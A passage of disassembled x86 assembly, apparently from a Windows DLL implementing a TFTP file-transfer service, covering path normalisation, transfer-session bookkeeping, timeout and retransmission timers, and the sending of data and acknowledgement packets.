loc_100251A:				; CODE XREF: sub_10023D8+CCj
		push	offset aTsize	; "tsize"
		push	ebp
		call	esi ; dword_100115C
		pop	ecx
		mov	edi, ebp
		test	eax, eax
		pop	ecx
		jnz	loc_10025B2
		or	edx, 0FFFFFFFFh
		xor	eax, eax
		mov	ecx, edx
		add	ebp, 6
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		add	ebx, 6
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		and	ecx, 3
		cmp	[esp+10h+arg_8], 2
		rep movsb
		jnz	short loc_100258D
		mov	edi, ebp
		mov	ecx, edx
		xor	eax, eax
		repne scasb
		not	ecx
		sub	edi, ecx
		mov	eax, ecx
		mov	esi, edi
		mov	edi, ebx
		shr	ecx, 2
		rep movsd
		mov	ecx, eax
		xor	eax, eax
		and	ecx, 3
		rep movsb
		mov	edi, ebp
		mov	ecx, edx
		repne scasb
		not	ecx
		dec	ecx
		mov	edi, ebp
		lea	ebx, [ebx+ecx+1]
		mov	ecx, edx
		jmp	short loc_10025CB
; ---------------------------------------------------------------------------


loc_100258D:				; CODE XREF: sub_10023D8+180j
		mov	eax, [esp+10h+arg_0]
		push	0Ah
		push	ebx
		push	dword ptr [eax+24h]


loc_1002597:				; CODE XREF: sub_10023D8+BBj
		call	dword_1001164	; _itoa
		add	esp, 0Ch
		mov	edi, ebx


loc_10025A2:				; CODE XREF: sub_10023D8+13Dj
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		lea	ebx, [ebx+ecx+1]
		jmp	short loc_10025C6
; ---------------------------------------------------------------------------


loc_10025B2:				; CODE XREF: sub_10023D8+150j
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		cmp	[ebp+ecx+1], al
		lea	ebp, [ebp+ecx+1]
		jz	short loc_10025E0


loc_10025C6:				; CODE XREF: sub_10023D8+B2j
					; sub_10023D8+1D8j
		mov	edi, ebp
		or	ecx, 0FFFFFFFFh


loc_10025CB:				; CODE XREF: sub_10023D8+1B3j
		xor	eax, eax
		repne scasb
		not	ecx
		dec	ecx
		cmp	[ebp+ecx+1], al
		lea	ebp, [ebp+ecx+1]
		jnz	loc_1002420


loc_10025E0:				; CODE XREF: sub_10023D8+1ECj
		mov	esi, [esp+10h+arg_10]


loc_10025E4:				; CODE XREF: sub_10023D8+42j
		mov	eax, [esp+10h+arg_C]
		sub	ebx, esi
		cmp	ebx, 2
		mov	[eax], ebx
		jnz	short loc_10025F4
		and	dword ptr [eax], 0


loc_10025F4:				; CODE XREF: sub_10023D8+217j
		xor	eax, eax


loc_10025F6:				; CODE XREF: sub_10023D8+244j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn	18h
; ---------------------------------------------------------------------------


loc_10025FD:				; CODE XREF: sub_10023D8+91j
					; sub_10023D8+9Cj
		push	0
		push	esi
		jmp	short loc_1002606
; ---------------------------------------------------------------------------


loc_1002602:				; CODE XREF: sub_10023D8+105j
					; sub_10023D8+110j
		push	0
		push	8


loc_1002606:				; CODE XREF: sub_10023D8+228j
		push	dword ptr [ecx+8]
		lea	eax, [ecx+0FFF1h]
		add	ecx, 0Ch
		push	eax
		push	ecx
		call	sub_100230A
		or	eax, 0FFFFFFFFh
		jmp	short loc_10025F6
sub_10023D8	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100261E	proc near		; CODE XREF: sub_1002F31+130p
					; sub_100333A+150p

arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ebx
		mov	ebx, [ebp+arg_0]
		push	esi
		push	edi
		mov	al, [ebx]
		mov	ecx, ebx
		mov	esi, ebx
		mov	[ebp+arg_0], ebx


loc_1002630:				; CODE XREF: sub_100261E+22j
		test	al, al
		jz	short loc_1002642
		cmp	al, 5Ch
		jz	short loc_100263C
		cmp	al, 2Fh
		jnz	short loc_1002642


loc_100263C:				; CODE XREF: sub_100261E+18j
		mov	al, [ecx+1]
		inc	ecx
		jmp	short loc_1002630
; ---------------------------------------------------------------------------


loc_1002642:				; CODE XREF: sub_100261E+14j
					; sub_100261E+1Cj ...
		mov	al, [ecx]
		test	al, al
		jz	loc_10026E4
		cmp	al, 2Eh
		jnz	loc_100271C
		mov	dl, [ecx+1]
		lea	edi, [ecx+1]
		cmp	dl, 5Ch
		jz	loc_1002718
		cmp	dl, 2Fh
		jz	loc_1002718
		cmp	dl, al
		jnz	loc_1002703
		mov	dl, [ecx+2]
		lea	edi, [ecx+2]
		cmp	dl, 5Ch
		jz	short loc_1002684
		cmp	dl, 2Fh
		jnz	short loc_1002703


loc_1002684:				; CODE XREF: sub_100261E+5Fj
		dec	esi
		mov	ecx, edi
		dec	esi
		cmp	esi, ebx
		jbe	short loc_10026E0


loc_100268C:				; CODE XREF: sub_100261E+7Bj
		mov	al, [esi]
		cmp	al, 5Ch
		jz	short loc_100269B
		cmp	al, 2Fh
		jz	short loc_100269B
		dec	esi
		cmp	esi, ebx
		jnb	short loc_100268C


loc_100269B:				; CODE XREF: sub_100261E+72j
					; sub_100261E+76j
		inc	esi


loc_100269C:				; CODE XREF: sub_100261E+8Ej
					; sub_100261E+EEj ...
		cmp	esi, [ebp+arg_0]
		jbe	short loc_10026AE
		cmp	byte ptr [esi-1], 20h
		lea	eax, [esi-1]
		jnz	short loc_10026AE
		mov	esi, eax
		jmp	short loc_100269C
; ---------------------------------------------------------------------------


loc_10026AE:				; CODE XREF: sub_100261E+81j
					; sub_100261E+8Aj
		mov	al, [ecx]
		cmp	al, 5Ch
		jz	short loc_10026B8
		cmp	al, 2Fh
		jnz	short loc_1002642


loc_10026B8:				; CODE XREF: sub_100261E+94j
		cmp	esi, ebx
		jz	short loc_10026CB
		mov	al, [esi-1]
		cmp	al, 5Ch
		jz	short loc_10026CB
		cmp	al, 2Fh
		jz	short loc_10026CB
		mov	byte ptr [esi],	5Ch
		inc	esi


loc_10026CB:				; CODE XREF: sub_100261E+9Cj
					; sub_100261E+A3j ...
		inc	ecx
		jz	short loc_10026D8
		mov	al, [ecx]
		cmp	al, 5Ch
		jz	short loc_10026CB
		cmp	al, 2Fh
		jz	short loc_10026CB


loc_10026D8:				; CODE XREF: sub_100261E+AEj
		mov	[ebp+arg_0], esi
		jmp	loc_1002642
; ---------------------------------------------------------------------------


loc_10026E0:				; CODE XREF: sub_100261E+6Cj
		xor	eax, eax
		jmp	short loc_10026FC
; ---------------------------------------------------------------------------


loc_10026E4:				; CODE XREF: sub_100261E+28j
		mov	cl, [esi-1]
		lea	eax, [esi-1]
		cmp	cl, 5Ch
		jz	short loc_10026F4
		cmp	cl, 2Fh
		jnz	short loc_10026F6


loc_10026F4:				; CODE XREF: sub_100261E+CFj
		mov	esi, eax


loc_10026F6:				; CODE XREF: sub_100261E+D4j
		and	byte ptr [esi],	0
		push	1
		pop	eax


loc_10026FC:				; CODE XREF: sub_100261E+C4j
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn	4
; ---------------------------------------------------------------------------


loc_1002703:				; CODE XREF: sub_100261E+50j
					; sub_100261E+64j ...
		mov	[esi], al
		mov	al, [ecx+1]
		inc	esi
		inc	ecx
		test	al, al
		jz	short loc_100269C
		cmp	al, 5Ch
		jz	short loc_100269C
		cmp	al, 2Fh
		jnz	short loc_1002703
		jmp	short loc_100269C
; ---------------------------------------------------------------------------


loc_1002718:				; CODE XREF: sub_100261E+3Fj
					; sub_100261E+48j
		mov	ecx, edi
		jmp	short loc_100269C
; ---------------------------------------------------------------------------


loc_100271C:				; CODE XREF: sub_100261E+30j
					; sub_100261E+11Dj
		test	al, al
		jz	loc_100269C
		cmp	al, 5Ch
		jz	loc_100269C
		cmp	al, 2Fh
		jz	loc_100269C
		mov	[esi], al
		mov	al, [ecx+1]
		inc	esi
		inc	ecx
		jmp	short loc_100271C
sub_100261E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_100273D	proc near		; CODE XREF: sub_1002F31+18Cp
					; sub_100333A+197p

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	ebx
		push	esi
		mov	esi, [ebp+arg_8]
		push	edi
		mov	edi, esi
		or	ecx, 0FFFFFFFFh
		xor	eax, eax
		mov	edx, [ebp+arg_0]
		repne scasb
		not	ecx
		dec	ecx
		mov	edi, edx
		mov	ebx, ecx
		or	ecx, 0FFFFFFFFh
		repne scasb
		not	ecx
		dec	ecx
		cmp	byte ptr [ebx+esi-1], 5Ch
		mov	edi, ecx
		setz	al
		xor	ecx, ecx
		cmp	byte ptr [edx],	5Ch
		setz	cl
		test	eax, eax
		jnz	short loc_1002784
		test	ecx, ecx
		jnz	short loc_1002784
		mov	[ebp+arg_8], 1
		jmp	short loc_1002791
; ---------------------------------------------------------------------------


loc_1002784:				; CODE XREF: sub_100273D+38j
					; sub_100273D+3Cj
		and	[ebp+arg_8], 0
		test	eax, eax
		jz	short loc_1002791
		test	ecx, ecx
		jz	short loc_1002791
		dec	ebx


loc_1002791:				; CODE XREF: sub_100273D+45j
					; sub_100273D+4Dj ...
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_4]
		add	eax, edi
		add	eax, ebx
		dec	ecx
		cmp	eax, ecx
		jbe	short loc_10027A4
		xor	eax, eax
		jmp	short loc_10027DA
; ---------------------------------------------------------------------------


loc_10027A4:				; CODE XREF: sub_100273D+61j
		mov	eax, [ebp+arg_8]
		inc	edi
		add	eax, ebx
		push	edi
		add	eax, edx
		push	edx
		push	eax
		call	dword_1001144	; memmove
		mov	eax, [ebp+arg_0]
		mov	ecx, ebx
		mov	edx, ecx
		mov	edi, eax
		shr	ecx, 2
		rep movsd
		mov	ecx, edx
		add	esp, 0Ch
		and	ecx, 3
		cmp	[ebp+arg_8], 0
		rep movsb
		jz	short loc_10027D7
		mov	byte ptr [ebx+eax], 5Ch


loc_10027D7:				; CODE XREF: sub_100273D+94j
		push	1
		pop	eax


loc_10027DA:				; CODE XREF: sub_100273D+65j
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn	0Ch
sub_100273D	endp


; =============== S U B	R O U T	I N E =======================================



sub_10027E1	proc near		; CODE XREF: sub_1002B5E+C7p
					; sub_1002F31+36Bp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		mov	ecx, [esi+10024h]
		lea	eax, [esi+10024h]
		test	ecx, ecx
		jz	short loc_1002817
		and	dword ptr [eax], 0
		mov	eax, [esp+8+arg_4]
		and	word ptr [esi+10014h], 0
		mov	[esi+10020h], ecx
		mov	eax, [eax+20h]
		mov	[esi+1001Ch], eax
		jmp	short loc_1002877
; ---------------------------------------------------------------------------


loc_1002817:				; CODE XREF: sub_10027E1+14j
		mov	edi, dword_1001104
		push	3
		call	edi ; dword_1001104
		mov	[esi+38h], ax
		mov	ax, [esi+10014h]
		push	eax
		call	edi ; dword_1001104
		mov	[esi+3Ah], ax
		mov	eax, [esp+8+arg_4]
		push	dword ptr [eax+20h]
		lea	eax, [esi+3Ch]
		push	eax
		push	dword ptr [esi+1002Ch]
		call	dword_1001090	; _read
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		mov	[esi+1001Ch], eax
		jnz	short loc_100286E
		mov	esi, dword_10010AC
		call	esi ; dword_10010AC
		call	esi ; dword_10010AC
		push	dword ptr [eax]
		call	dword_100102C	; RtlSetLastWin32Error
		xor	eax, eax
		jmp	short loc_100287A
; ---------------------------------------------------------------------------


loc_100286E:				; CODE XREF: sub_10027E1+75j
		add	eax, 4
		mov	[esi+10020h], eax


loc_1002877:				; CODE XREF: sub_10027E1+34j
		push	1
		pop	eax


loc_100287A:				; CODE XREF: sub_10027E1+8Bj
		pop	edi
		pop	esi
		retn	8
sub_10027E1	endp


; =============== S U B	R O U T	I N E =======================================



sub_100287F	proc near		; CODE XREF: sub_1002F31+2C6p
					; sub_100333A+2CDp

arg_0		= dword	ptr  4

		push	esi
		mov	esi, offset dword_1006080
		push	esi
		call	dword_1001058	; RtlEnterCriticalSection
		mov	ecx, dword_1006098
		push	esi
		mov	eax, [esp+8+arg_0]
		mov	[eax], ecx
		mov	dword ptr [eax+4], offset dword_1006098
		mov	[ecx+4], eax
		mov	dword_1006098, eax
		call	dword_100104C	; RtlLeaveCriticalSection
		push	1
		pop	eax
		pop	esi
		retn	4
sub_100287F	endp


; =============== S U B	R O U T	I N E =======================================



sub_10028B5	proc near		; CODE XREF: sub_1002A3D+Cp
					; sub_1002EC8+8p ...

arg_0		= dword	ptr  4

		push	ebx
		mov	ebx, dword_1001058
		push	esi
		push	edi
		mov	edi, offset dword_1006080
		push	edi
		call	ebx ; dword_1001058
		mov	eax, dword_1006098
		mov	ecx, offset dword_1006098


loc_10028D0:				; CODE XREF: sub_10028B5+2Dj
		cmp	eax, ecx
		jz	short loc_10028F2
		mov	edx, [eax+8]
		lea	esi, [eax-18h]
		cmp	edx, [esp+0Ch+arg_0]
		jz	short loc_10028E4
		mov	eax, [eax]
		jmp	short loc_10028D0
; ---------------------------------------------------------------------------


loc_10028E4:				; CODE XREF: sub_10028B5+29j
		push	esi
		call	ebx ; dword_1001058
		push	edi
		call	dword_100104C	; RtlLeaveCriticalSection
		mov	eax, esi
		jmp	short loc_10028FB
; ---------------------------------------------------------------------------


loc_10028F2:				; CODE XREF: sub_10028B5+1Dj
		push	edi
		call	dword_100104C	; RtlLeaveCriticalSection
		xor	eax, eax


loc_10028FB:				; CODE XREF: sub_10028B5+3Bj
		pop	edi
		pop	esi
		pop	ebx
		retn	4
sub_10028B5	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002901	proc near		; CODE XREF: sub_100297A+Ap

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		mov	eax, [esi+20h]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_1002915
		push	eax
		call	dword_100111C	; closesocket


loc_1002915:				; CODE XREF: sub_1002901+Bj
		mov	eax, [esi+10004h]
		test	eax, eax
		jz	short loc_100292E
		push	0
		push	eax
		push	dword_10060A0
		call	dword_1001158	; RtlDeleteTimer


loc_100292E:				; CODE XREF: sub_1002901+1Cj
		push	0
		push	dword ptr [esi+0FFFCh]
		call	dword_1001168	; RtlDeregisterWaitEx
		push	dword ptr [esi+0FFF8h]
		call	dword_1001054	; CloseHandle
		push	esi
		call	dword_1001028	; RtlDeleteCriticalSection
		pop	esi
		retn	4
sub_1002901	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002953	proc near		; CODE XREF: sub_100297A+2Fp
					; sub_100297A+37p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		mov	eax, [esi+1002Ch]
		cmp	eax, 0FFFFFFFFh
		jz	short loc_100296B
		push	eax
		call	dword_100108C	; _close
		pop	ecx


loc_100296B:				; CODE XREF: sub_1002953+Ej
		push	esi
		call	dword_10010A0	; free
		pop	ecx
		pop	esi
		retn	4
sub_1002953	endp

; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_100297A	proc near		; CODE XREF: sub_10029BA+55p

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		test	esi, esi
		jz	short loc_10029B6
		push	esi
		call	sub_1002901
		mov	eax, [esi+24h]
		dec	eax
		jz	short loc_10029B0
		dec	eax
		jz	short loc_10029A8
		dec	eax
		jz	short loc_10029A0
		dec	eax
		jnz	short loc_10029B6
		push	esi
		call	nullsub_1
		jmp	short loc_10029B6
; ---------------------------------------------------------------------------


loc_10029A0:				; CODE XREF: sub_100297A+19j
		push	esi
		call	nullsub_1
		jmp	short loc_10029B6
; ---------------------------------------------------------------------------


loc_10029A8:				; CODE XREF: sub_100297A+16j
		push	esi
		call	sub_1002953
		jmp	short loc_10029B6
; ---------------------------------------------------------------------------


loc_10029B0:				; CODE XREF: sub_100297A+13j
		push	esi
		call	sub_1002953


loc_10029B6:				; CODE XREF: sub_100297A+7j
					; sub_100297A+1Cj ...
		pop	esi
		retn	4
sub_100297A	endp


; =============== S U B	R O U T	I N E =======================================



sub_10029BA	proc near		; DATA XREF: sub_10018DB+98o
		push	ebx
		mov	ebx, dword_1001058
		push	esi
		push	offset dword_1006080
		call	ebx ; dword_1001058
		mov	esi, dword_1006098
		cmp	esi, offset dword_1006098
		jz	short loc_1002A28
		push	edi
		push	ebp


loc_10029D9:				; CODE XREF: sub_10029BA+6Aj
		lea	edi, [esi-18h]
		push	edi
		call	ebx ; dword_1001058
		mov	ebp, [esi]
		inc	dword ptr [edi+10008h]
		cmp	dword ptr [edi+10008h],	4
		lea	eax, [edi+10008h]
		push	edi
		jb	short loc_1002A16
		call	ebx ; dword_1001058
		mov	eax, [esi]
		mov	esi, [esi+4]
		mov	[esi], eax
		mov	[eax+4], esi
		mov	ax, [edi+2Ah]
		push	eax
		call	dword_1001104	; ntohs
		push	edi
		call	sub_100297A
		jmp	short loc_1002A1C
; ---------------------------------------------------------------------------


loc_1002A16:				; CODE XREF: sub_10029BA+3Bj
		call	dword_100104C	; RtlLeaveCriticalSection


loc_1002A1C:				; CODE XREF: sub_10029BA+5Aj
		cmp	ebp, offset dword_1006098
		mov	esi, ebp
		jnz	short loc_10029D9
		pop	ebp
		pop	edi


loc_1002A28:				; CODE XREF: sub_10029BA+1Bj
		push	offset dword_1006080
		call	dword_100104C	; RtlLeaveCriticalSection
		call	sub_1001A1F
		pop	esi
		pop	ebx
		retn	8
sub_10029BA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002A3D	proc near		; DATA XREF: sub_1002F31+341o
					; sub_100333A+32Co

var_10		= byte ptr -10h
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_0]
		call	sub_10028B5
		mov	esi, eax
		xor	ebx, ebx
		cmp	esi, ebx
		jz	loc_1002B57
		mov	eax, [esi+1000Ch]
		cmp	eax, 0Ah
		jnb	loc_1002B0B
		cmp	eax, 5
		jbe	short loc_1002A8E
		lea	eax, [ebp+var_10]
		push	eax
		call	dword_1001024	; GetLocalTime
		mov	ax, [esi+2Ah]
		push	eax
		call	dword_100110C	; ntohs
		mov	ax, [esi+3Ah]
		push	eax
		call	dword_1001104	; ntohs


loc_1002A8E:				; CODE XREF: sub_1002A3D+2Fj
		lea	eax, [esi+28h]
		push	10h
		push	eax
		push	ebx
		push	dword ptr [esi+10020h]
		lea	eax, [esi+38h]
		push	eax
		push	dword ptr [esi+20h]
		call	dword_1001130	; sendto
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_1002AB3
		call	dword_10010F8	; WSAGetLastError


loc_1002AB3:				; CODE XREF: sub_1002A3D+6Ej
		mov	edi, [esi+10004h]
		inc	dword ptr [esi+1000Ch]
		cmp	edi, ebx
		jz	loc_1002B4C
		cmp	[esi+10028h], ebx
		jnz	short loc_1002AEA
		mov	eax, [esi+10000h]
		lea	ecx, [esi+10000h]
		shl	eax, 1
		mov	edx, 2710h
		mov	[ecx], eax
		cmp	eax, edx
		jbe	short loc_1002AEA
		mov	[ecx], edx


loc_1002AEA:				; CODE XREF: sub_1002A3D+90j
					; sub_1002A3D+A9j
		mov	eax, [esi+10000h]
		push	eax
		push	eax
		push	edi
		push	dword_10060A0
		call	dword_1001154	; RtlUpdateTimer
		cmp	eax, ebx
		jz	short loc_1002B4C
		call	dword_1001038	; RtlGetLastWin32Error
		jmp	short loc_1002B4C
; ---------------------------------------------------------------------------


loc_1002B0B:				; CODE XREF: sub_1002A3D+26j
		cmp	esi, ebx
		jz	short loc_1002B57
		push	offset aTimeout	; "Timeout"
		push	ebx
		push	dword ptr [esi+20h]
		lea	eax, [esi+28h]
		push	ebx
		push	eax
		call	sub_100230A
		mov	eax, [esi+10004h]
		lea	edi, [esi+10004h]
		cmp	eax, ebx
		jz	short loc_1002B40
		push	ebx
		push	eax
		push	dword_10060A0
		call	dword_1001158	; RtlDeleteTimer


loc_1002B40:				; CODE XREF: sub_1002A3D+F3j
		mov	[edi], ebx
		mov	dword ptr [esi+10008h],	4


loc_1002B4C:				; CODE XREF: sub_1002A3D+84j
					; sub_1002A3D+C4j ...
		cmp	esi, ebx
		jz	short loc_1002B57
		push	esi
		call	dword_100104C	; RtlLeaveCriticalSection


loc_1002B57:				; CODE XREF: sub_1002A3D+17j
					; sub_1002A3D+D0j ...
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn	8
sub_1002A3D	endp


; =============== S U B	R O U T	I N E =======================================



sub_1002B5E	proc near		; CODE XREF: sub_1002EC8+3Dp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		push	ecx
		push	ebx
		mov	ebx, dword_100110C
		push	ebp
		push	esi
		mov	esi, [esp+10h+arg_0]
		push	edi
		mov	edi, [esp+14h+arg_4]
		xor	ebp, ebp
		mov	eax, [esi+10018h]
		push	4
		mov	[esp+18h+var_4], ebp
		mov	[edi+20h], eax
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002BA6
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_100110C
		cmp	[edi+36h], ax
		jnz	short loc_1002BA6
		and	dword ptr [esi+1000Ch],	0
		push	1
		pop	ebp
		jmp	short loc_1002BCE
; ---------------------------------------------------------------------------


loc_1002BA6:				; CODE XREF: sub_1002B5E+2Aj
					; sub_1002B5E+3Aj
		mov	ax, [edi+36h]
		push	eax
		call	ebx ; dword_100110C
		mov	ax, [edi+34h]
		push	eax
		call	dword_1001104	; ntohs
		push	4
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002BCE
		mov	ax, [esi+10014h]
		dec	ax
		push	eax
		call	ebx ; dword_100110C


loc_1002BCE:				; CODE XREF: sub_1002B5E+46j
					; sub_1002B5E+62j
		test	ebp, ebp
		jz	loc_1002C96
		cmp	dword ptr [esi+10030h],	0
		jz	short loc_1002C1C
		mov	eax, [esi+10004h]
		lea	edi, [esi+10004h]
		test	eax, eax
		jz	short loc_1002BFE
		push	0
		push	eax
		push	dword_10060A0
		call	dword_1001158	; RtlDeleteTimer


loc_1002BFE:				; CODE XREF: sub_1002B5E+8Fj
		and	dword ptr [edi], 0
		mov	dword ptr [esi+10008h],	4


loc_1002C0B:				; CODE XREF: sub_1002B5E+DBj
					; sub_1002B5E+13Ej ...
		push	esi
		call	dword_100104C	; RtlLeaveCriticalSection
		xor	eax, eax


loc_1002C14:				; CODE XREF: sub_1002B5E+183j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		pop	ecx
		retn	8
; ---------------------------------------------------------------------------


loc_1002C1C:				; CODE XREF: sub_1002B5E+7Fj
		inc	word ptr [esi+10014h]
		push	edi
		push	esi
		call	sub_10027E1
		mov	ebp, eax
		xor	eax, eax
		cmp	ebp, eax
		jnz	short loc_1002C3B
		mov	ax, [edi+0Eh]
		push	eax
		call	ebx ; dword_100110C
		jmp	short loc_1002C0B
; ---------------------------------------------------------------------------


loc_1002C3B:				; CODE XREF: sub_1002B5E+D2j
		cmp	[esi+10028h], eax
		mov	[esi+1000Ch], eax
		mov	[esi+10008h], eax
		jnz	short loc_1002C59
		mov	dword ptr [esi+10000h],	3E8h


loc_1002C59:				; CODE XREF: sub_1002B5E+EFj
		mov	ecx, [esi+10004h]
		cmp	ecx, eax
		jz	short loc_1002C78
		mov	eax, [esi+10000h]
		push	eax
		push	eax
		push	ecx
		push	dword_10060A0
		call	dword_1001154	; RtlUpdateTimer


loc_1002C78:				; CODE XREF: sub_1002B5E+103j
		mov	eax, [esi+1001Ch]
		cmp	eax, [edi+20h]
		jnb	short loc_1002C9A
		mov	ax, [edi+0Eh]
		push	eax
		call	ebx ; dword_100110C
		mov	dword ptr [esi+10030h],	1
		jmp	short loc_1002C9A
; ---------------------------------------------------------------------------


loc_1002C96:				; CODE XREF: sub_1002B5E+72j
		mov	ebp, [esp+14h+var_4]


loc_1002C9A:				; CODE XREF: sub_1002B5E+123j
					; sub_1002B5E+136j
		test	ebp, ebp
		jz	loc_1002C0B
		mov	ax, [edi+0Eh]
		push	eax
		call	ebx ; dword_100110C
		add	edi, 0Ch
		push	10h
		push	edi
		push	0
		push	dword ptr [esi+10020h]
		lea	eax, [esi+38h]
		push	eax
		push	dword ptr [esi+20h]
		call	dword_1001130	; sendto
		cmp	eax, 0FFFFFFFFh
		jnz	loc_1002C0B
		call	dword_10010F8	; WSAGetLastError
		test	esi, esi
		jz	short loc_1002CDE
		push	esi
		call	dword_100104C	; RtlLeaveCriticalSection


loc_1002CDE:				; CODE XREF: sub_1002B5E+177j
		push	1
		pop	eax
		jmp	loc_1002C14
sub_1002B5E	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_1002CE6	proc near		; CODE XREF: sub_1002EC8+34p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		and	[ebp+var_4], 0
		push	ebx
		mov	ebx, dword_100110C
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		mov	edi, [ebp+arg_4]
		push	3
		mov	eax, [esi+10018h]
		mov	[edi+20h], eax
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002D3A
		mov	ax, [esi+10014h]
		inc	ax
		push	eax
		call	ebx ; dword_100110C
		cmp	[edi+36h], ax
		jnz	short loc_1002D3A
		inc	word ptr [esi+10014h]
		xor	ebx, ebx
		mov	[ebp+var_4], 1
		mov	[esi+10008h], ebx
		jmp	short loc_1002D9D
; ---------------------------------------------------------------------------


loc_1002D3A:				; CODE XREF: sub_1002CE6+28j
					; sub_1002CE6+3Aj
		push	3
		call	ebx ; dword_100110C
		cmp	[edi+34h], ax
		jnz	short loc_1002D9B
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_100110C
		cmp	[edi+36h], ax
		jnz	short loc_1002D9B
		mov	ebx, dword_1001104
		push	4
		call	ebx ; dword_1001104
		mov	[esi+38h], ax
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_1001104
		add	edi, 0Ch
		push	10h
		mov	[esi+3Ah], ax
		push	edi
		push	0
		lea	eax, [esi+38h]
		push	4
		push	eax
		push	dword ptr [esi+20h]
		call	dword_1001130	; sendto
		cmp	eax, 0FFFFFFFFh
		jnz	loc_1002EB3
		call	dword_10010F8	; WSAGetLastError
		jmp	loc_1002EB3
; ---------------------------------------------------------------------------


loc_1002D9B:				; CODE XREF: sub_1002CE6+5Cj
					; sub_1002CE6+6Cj
		xor	ebx, ebx


loc_1002D9D:				; CODE XREF: sub_1002CE6+52j
		cmp	[ebp+var_4], ebx
		jz	short loc_1002DE4
		lea	eax, [ebp+arg_4]
		push	eax
		mov	eax, [edi+2Ch]
		push	dword ptr [esi+10030h]
		sub	eax, 4
		push	eax
		lea	eax, [edi+38h]
		push	eax
		push	dword ptr [esi+1002Ch]
		call	sub_100373A
		cmp	[ebp+var_4], ebx
		mov	[ebp+arg_0], eax
		jz	short loc_1002DE4
		cmp	eax, ebx
		jge	short loc_1002DF7
		push	ebx
		push	3
		push	dword ptr [edi+8]
		lea	eax, [edi+0FFF1h]
		add	edi, 0Ch
		push	eax
		push	edi
		call	sub_100230A


loc_1002DE4:				; CODE XREF: sub_1002CE6+BAj
					; sub_1002CE6+E2j
		cmp	esi, ebx
		jz	short loc_1002DEF
		push	esi
		call	dword_100104C	; RtlLeaveCriticalSection


loc_1002DEF:				; CODE XREF: sub_1002CE6+100j
		push	1
		pop	eax
		jmp	loc_1002EBC
; ---------------------------------------------------------------------------


loc_1002DF7:				; CODE XREF: sub_1002CE6+E6j
		mov	eax, [edi+2Ch]
		sub	eax, 4
		cmp	eax, [edi+20h]
		ja	loc_1002EB3
		mov	ebx, dword_1001104
		push	4
		call	ebx ; dword_1001104
		mov	[esi+38h], ax
		mov	ax, [esi+10014h]
		push	eax
		call	ebx ; dword_1001104
		mov	[esi+3Ah], ax
		lea	eax, [edi+0Ch]
		push	10h
		xor	ebx, ebx
		push	eax
		push	ebx
		lea	eax, [esi+38h]
		push	4
		push	eax
		push	dword ptr [esi+20h]
		call	dword_1001130	; sendto
		mov	[ebp+arg_0], eax
		mov	eax, [esi+10004h]
		cmp	eax, ebx
		jz	short loc_1002E74
		cmp	[esi+10028h], ebx
		mov	[esi+1000Ch], ebx
		jnz	short loc_1002E5F
		mov	dword ptr [esi+10000h],	3E8h


loc_1002E5F:				; CODE XREF: sub_1002CE6+16Dj
		mov	ecx, [esi+10000h]
		push	ecx
		push	ecx
		push	eax
		push	dword_10060A0
		call	dword_1001154	; RtlUpdateTimer


loc_1002E74:				; CODE XREF: sub_1002CE6+15Fj
		cmp	[ebp+arg_0], 0FFFFFFFFh
		jnz	short loc_1002E80
		call	dword_10010F8	; WSAGetLastError


loc_1002E80:				; CODE XREF: sub_1002CE6+192j
		mov	eax, [edi+2Ch]
		sub	eax, 4
		cmp	eax, [edi+20h]
		jnb	short loc_1002EB3
		mov	eax, [esi+10004h]
		cmp	eax, ebx
		jz	short loc_1002EA3
		push	ebx
		push	eax
		push	dword_10060A0
		call	dword_1001158	; RtlDeleteTimer


loc_1002EA3:				; CODE XREF: sub_1002CE6+1ADj
		mov	[esi+10004h], ebx
		mov	dword ptr [esi+10008h],	4


loc_1002EB3:				; CODE XREF: sub_1002CE6+A4j
					; sub_1002CE6+B0j ...
